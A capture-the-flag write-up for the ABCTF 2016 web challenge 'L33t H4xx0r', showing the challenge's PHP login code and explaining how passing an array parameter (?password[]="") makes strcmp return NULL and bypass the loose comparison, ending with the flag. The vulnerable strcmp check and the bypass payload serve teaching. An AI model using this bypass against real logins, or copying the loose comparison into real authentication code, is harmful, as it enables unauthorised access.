ABCTF - 70 - L33t H4xx0r - Web Exploitation

Information#

Version#

By	Version	Comment
noraj	1.0	Creation

CTF#

• Name : ABCTF 2016
• Website : http://abctf.xyz/
• Type : Online
• Format : Jeopardy - Student
• CTF Time : link

Description#

If you could bypass the login you could get the flag. Link [this]:http://yrmyzscnvh.abctf.xyz/web6/

Hint: Some ways of comparing two strings are very insecure.

Solution#

1. Look at page source code
2. See the comment: source.txt
3. So go to http://yrmyzscnvh.abctf.xyz/web6/source.txt and see the server side source code:

<?php
	$FLAGWEB6 = (file_get_contents("flag.txt"));
	$PASSWORD =  (file_get_contents("flag.txt")); //haha

	if(isset($_GET['password'])){

	if(strcmp($PASSWORD, $_GET['password']) == 0){
			$success = true;
		}
		else{
			$success = false;
		}

	}
	else {
		$success = false;
	}
?>

4. The vulnerability come from the usage of strcmp php function. Normally return 0 if two strings are equals. But if one of the two operators is not a string some weird behaviour can happen. For example if you compare a string and an array it returns NULL + PHP Warning:

strcmp("foo", array()) => NULL + PHP Warning
strcmp("foo", new stdClass) => NULL + PHP Warning

5. So we can bypass if(strcmp($PASSWORD, $_GET['password']) == 0) and change it to if(NULL == 0)
6. And thanks to PHP native weakness NULL == 0 return True. More details
7. So now we just have to forge a GET request giving an array: http://yrmyzscnvh.abctf.xyz/web6/?password[]="".
8. Why? What is that? Transforming ?password=value to ?password[]=value will pass an array instead of a simple value so ?password[]="" will give an empty array.
9. Flag is abctf{always_know_whats_going_on}